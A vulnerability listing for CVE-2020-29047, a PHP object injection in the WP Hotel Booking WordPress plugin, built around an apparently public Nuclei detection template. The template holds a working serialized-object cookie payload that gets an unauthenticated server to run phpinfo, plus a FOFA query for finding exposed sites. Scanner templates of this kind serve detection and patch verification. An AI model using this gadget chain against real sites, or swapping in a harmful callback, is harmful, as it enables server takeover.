漏洞描述
The wp-hotel-booking plugin through 1.10.2 for WordPress allows remote attackers to execute arbitrary code because of an unserialize operation on the thimpress_hotel_booking_1 cookie in load in includes/class-wphb-sessions.php.
CVE-2020-29047: WP Hotel Booking < 1.10.4 - PHP Object Injection
PoC代码[已公开]
id: CVE-2020-29047
info:
name: WP Hotel Booking < 1.10.4 - PHP Object Injection
author: DhiyaneshDk
severity: critical
description: |
The wp-hotel-booking plugin through 1.10.2 for WordPress allows remote attackers to execute arbitrary code because of an unserialize operation on the thimpress_hotel_booking_1 cookie in load in includes/class-wphb-sessions.php.
reference:
- https://wordpress.org/plugins/wp-hotel-booking/#developers
- https://github.com/20142995/nuclei-templates
- https://nvd.nist.gov/vuln/detail/CVE-2020-29047
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-29047
cwe-id: CWE-502
epss-score: 0.78383
epss-percentile: 0.98997
cpe: cpe:2.3:a:thimpress:wp_hotel_booking:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: thimpress
product: wp_hotel_booking
framework: wordpress
fofa-query: body="wp-content/plugins/wp-hotel-booking"
tags: cve,cve2020,wordpress,wp-plugin,wp,wp-hotel-booking,rce,thimpress
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Cookie: thimpress_hotel_booking_1=O:11:"WPHB_Logger":1:{s:21:"%00WPHB_Logger%00_handles"%3BC:33:"Requests_Utility_FilteredIterator":67:{x:i:0%3Ba:1:{i:0%3Bs:2:"-1"%3B}%3Bm:a:1:{s:11:"%00*%00callback"%3Bs:7:"phpinfo"%3B}}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "PHP Extension"
- "wp-hotel-booking"
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022035ee5aa9aef9ed551ac691c647ba781566c67d01c7b7f126b3ca787a0326c328022100e19e1f17a39e48038329e001fcb476207c8baffafaa9662e2c703432f5ef69ff:922c64590222798bb761d5b6d8e72950